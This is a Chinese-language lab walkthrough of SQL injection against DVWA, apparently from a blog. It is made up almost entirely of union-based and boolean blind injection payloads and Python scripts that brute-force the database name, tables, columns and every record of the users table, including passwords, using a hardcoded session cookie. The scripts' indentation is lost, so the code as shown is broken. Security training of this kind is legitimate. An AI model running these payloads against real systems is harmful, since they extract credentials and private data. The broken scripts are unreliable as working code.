概述
本文示例样本为DVWA-SQL Injection(Bind),难度easy,如图:
报错注入
1' order by 1-n
1' union select 1,2,..n #
1' union select user(), version(), database()
1' union select 1, group_concat(table_name) from information_schema.tables where table_schema = database() # 查表
1' union select 1, group_concat(column_name) from information_schema.columns where table_name = 'users' # 查字段
1' union select null, concat_ws(",",user,password) from users # 查数据库字段值
盲注
1' and length(database()) > 4 and '1' = '1 获取当前数据库的长度 >4 报错 >3不报错,说明长度是4
1' and ((select ascii(substr(database(),1,1)))>32) and '1'='1 获取当前数据库名字 ascii码的范围32-127
1' and (select count(table_name) from information_schema.tables where table_schema=database()) > 2 and '1' = '1 获取表的数量
1' and length((select table_name from information_schema.tables where table_schema=database() limit 0,1)) > 1 and '1'='1 获取第一张表的长度
1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit 0,1)),1,1)) >1 and '1'='1 获取第一张表名
1' and (select count(column_name) from information_schema.columns where table_name='users') > 2 and '1' = '1 获取users表字段的数量
1' and length((select column_name from information_schema.columns where table_name='users' limit 0,1)) > 1 and '1' = '1 获取user表每个字段的长度
1' and ascii(mid((select column_name from information_schema.columns where table_name='users' limit 0,1),1,1)) > 1 and '1' ='1 获取users表字段值
1' and (select count(1) from users) > 1 and '1'='1 脱裤-获取users表记录数量
1' and length((select user_id from users limit 0,1))> 1 and '1' = '1 脱裤-获得每条记录的长度
1' and ascii(mid((select user_id from users limit 0,1),1,1)) > 1 and '1'='1 脱裤-获得每条记录的内容
脚本
-----盲注:猜库长度--------------------------------
import requests
# guest database length
str1 = 'MISSING'
len = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,50):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length(database()) > %s and '1' = '1&Submit=Submit"%i
r = requests.get(url,headers=headers).text
if str1 in r:
len += i
break
print(len)
-----盲注:猜库--------------------------------
import requests
# guest database name
str1 = 'MISSING'
database = ''
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,5):
for j in range(32,128):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ((select ascii(substr(database(),%s,1)))>%s) and '1'='1&Submit=Submit"%(i,j)
r = requests.get(url,headers=headers).text
if str1 in r:
database += chr(j)
print(chr(j))
break
print(database)
-----盲注:猜表数量--------------------------------
import requests
# guest database table name sum
str1 = 'MISSING'
len = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for i in range(1,50):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(table_name) from information_schema.tables where table_schema=database()) > %s and '1' = '1&Submit=Submit"%i
r = requests.get(url,headers=headers).text
if str1 in r:
len += i
break
print(len)
-----盲注:猜表名--------------------------------
import requests
# guest database table name len
# hint: table sum is 2
str1 = 'MISSING'
t_len = []
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
print('guest database table name len start...')
for i in range(0,2):
for j in range(1, 50):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select table_name from information_schema.tables where table_schema=database() limit %s,1)) > %s and '1'='1&Submit=Submit"%(i,j)
r = requests.get(url,headers=headers).text
if str1 in r:
t_len.append(j)
break
print('guest database table name start...')
table_name = ''
for i in range(0,2):
for j in range(1, t_len[i]+1):
for x in range(32, 128):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid(((select table_name from information_schema.tables where table_schema=database() limit %s,1)),%s,1)) >%s and '1'='1&Submit=Submit"%(i,j,x)
r = requests.get(url,headers=headers).text
if str1 in r:
table_name += chr(x)
break
print(table_name)
table_name = ''
-----盲注:猜表字段--------------------------------
import requests
# guest database table columns
# hint: table name: guestbook, users
# step 1 get table columns sum
# step 2 get length of each table column
# step 3 get name of each table column
str1 = 'MISSING'
table_name = 'users'
column_sum = 0
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for j in range(1, 50):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(column_name) from information_schema.columns where table_name='%s') > %s and '1' = '1&Submit=Submit"%(table_name,j)
r = requests.get(url,headers=headers).text
if str1 in r:
column_sum += j
break
print('step 1 get table column sum:%s'%(column_sum))
column_len = []
for i in range(0, column_sum):
for j in range(1, 50):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select column_name from information_schema.columns where table_name='%s' limit %s,1)) > %s and '1' = '1&Submit=Submit"%(table_name,i,j)
r = requests.get(url,headers=headers).text
if str1 in r:
column_len.append(j)
break
print('step 2 get length of each table column:')
for i in range(len(column_len)):
print(column_len[i])
print('step 3 get name of each table column:')
column_name = ''
column_name_list = []
for i in range(0, column_sum):
for k in range(1, column_len[i]+1):
for j in range(32, 128):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid((select column_name from information_schema.columns where table_name='%s' limit %s,1),%s,1)) > %s and '1' ='1&Submit=Submit"%(table_name,i,k,j)
r = requests.get(url,headers=headers).text
if str1 in r:
column_name += chr(j)
break
print(column_name)
column_name_list.append(column_name)
column_name = ''
-----盲注:猜表内容--------------------------------
import requests
# guest database table content
# hint: table name: users, columns:user_id,first_name,last_name,user,password,avatar,last_login,failed_login
# step 1 get number of table records
# step 2 get length of each table records
# step 3 get records of each table
str1 = 'MISSING'
table_name = 'users'
records_sum = 0
column_name = ['user_id','first_name','last_name','user','password','avatar','last_login','failed_login']
headers = {"Cookie":"security=low; PHPSESSID=ob0elphs0r08djc2r5muo2huv2"}
for j in range(1, 500):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and (select count(1) from %s) > %s and '1'='1&Submit=Submit"%(table_name,j)
r = requests.get(url,headers=headers).text
if str1 in r:
records_sum += j
break
print('step 1 get number of table records:%s'%(records_sum))
records = ''
for i in range(0, records_sum):
print("record line : %s"%(i+1))
for j in range(len(column_name)):
print("%s:"%(column_name[j]))
for k in range(0, 500):
url = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and length((select %s from %s limit %s,1))> %s and '1' = '1&Submit=Submit"%(column_name[j],table_name,i,k)
r = requests.get(url,headers=headers).text
if str1 in r:
for l in range(1,k+1):
for m in range(32, 128):
url2 = "http://example.jp/dvwa/vulnerabilities/sqli_blind/?id=1' and ascii(mid((select %s from %s limit %s,1),%s,1)) > %s and '1'='1&Submit=Submit"%(column_name[j],table_name,i,l,m)
r2 = requests.get(url2,headers=headers).text
if str1 in r2:
records += chr(m)
break
print(records)
records = ''
break
1353
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
